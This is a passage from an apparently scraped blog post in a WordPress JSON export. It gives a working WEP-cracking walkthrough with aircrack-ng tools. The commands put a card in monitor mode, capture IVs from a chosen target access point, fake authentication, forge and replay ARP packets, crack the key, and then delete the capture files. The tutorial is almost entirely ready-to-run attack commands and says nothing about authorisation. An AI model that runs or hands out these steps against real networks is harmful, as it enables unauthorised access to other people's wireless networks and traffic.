1
2
3
<\/div><\/td>
airmon-ng start wlan0 #create interface man0 in monitor mode of wlan0<\/span>
\nairodump-ng --encrypt<\/span> WEP mon0 #shows APs with WEP only<\/span>
\nairodump-ng -c<\/span> [<\/span>channel]<\/span> --bssid<\/span> [<\/span>mac_of_ap]<\/span> --ivs<\/span> -w<\/span> [<\/span>filename]<\/span> mon0<\/div><\/td><\/tr><\/tbody><\/table><\/div>\nNow open a second terminal and run the following
\nThe first line associates you with the mac (see terminal window 1)
\nThe second line looks for an IV that you can replay.
\nThe third line creates a packet that you replay in the fourth line<\/p>\n 1 2 3 4 <\/div><\/td> aireplay-ng -1<\/span> 0<\/span> -a<\/span> [<\/span>mac_of_ap]<\/span> -h<\/span> [<\/span>mac_of_wificard]<\/span> wlan0
\naireplay-ng -5<\/span> -b<\/span> [<\/span>mac_of_ap]<\/span> -h<\/span> [<\/span>mac_of_wificard]<\/span> wlan0 #answer Y to prompt<\/span>
\npacketforge-ng -0<\/span> -a<\/span> [<\/span>mac_of_ap]<\/span> -h<\/span> [<\/span>mac_of_wificard]<\/span> -k<\/span> 255.255.255.255 -l<\/span> 255.255.255.255 -y<\/span> *<\/span>.xor -w<\/span> arp-packet wlan0
\naireplay-ng -2<\/span> -r<\/span> arp-packet wlan0 #answer Y to prompt<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\nWatch those packets fly up in reminal window 1!!!!
\nOpen a new terminal window and run the following to start cracking<\/p>\n 1 <\/div><\/td> aircrack-ng -n<\/span> 128<\/span> -b<\/span> [<\/span>mac_of_ap]<\/span> *<\/span>.ivs<\/div><\/td><\/tr><\/tbody><\/table><\/div>\nRemember to clean up your crap once you have finished<\/p>\n 1 <\/div><\/td> rm<\/span> *<\/span>.ivs *<\/span>.cap *<\/span>.xor<\/div><\/td><\/tr><\/tbody><\/table><\/div>\nAnd to simplify this i’ve made a bash script, see the apps page.<\/p>\n","protected":false},"excerpt":{"rendered":" Run the following in the first terminal window to create an interface in monitor mode called mon0 of interface wlan0 The second command shows WEP encrypted networks nearby The third command starts capturing traffic from your target 123airmon-ng start wlan0 #create interface man0 in monitor mode of wlan0 airodump-ng –encrypt WEP mon0 #shows APs with […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3,4],"tags":[28,29,5,24,25],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/22"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=22"}],"version-history":[{"count":11,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/22\/revisions"}],"predecessor-version":[{"id":191,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/22\/revisions\/191"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=22"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=22"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=22"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}} | |
| |
| |
|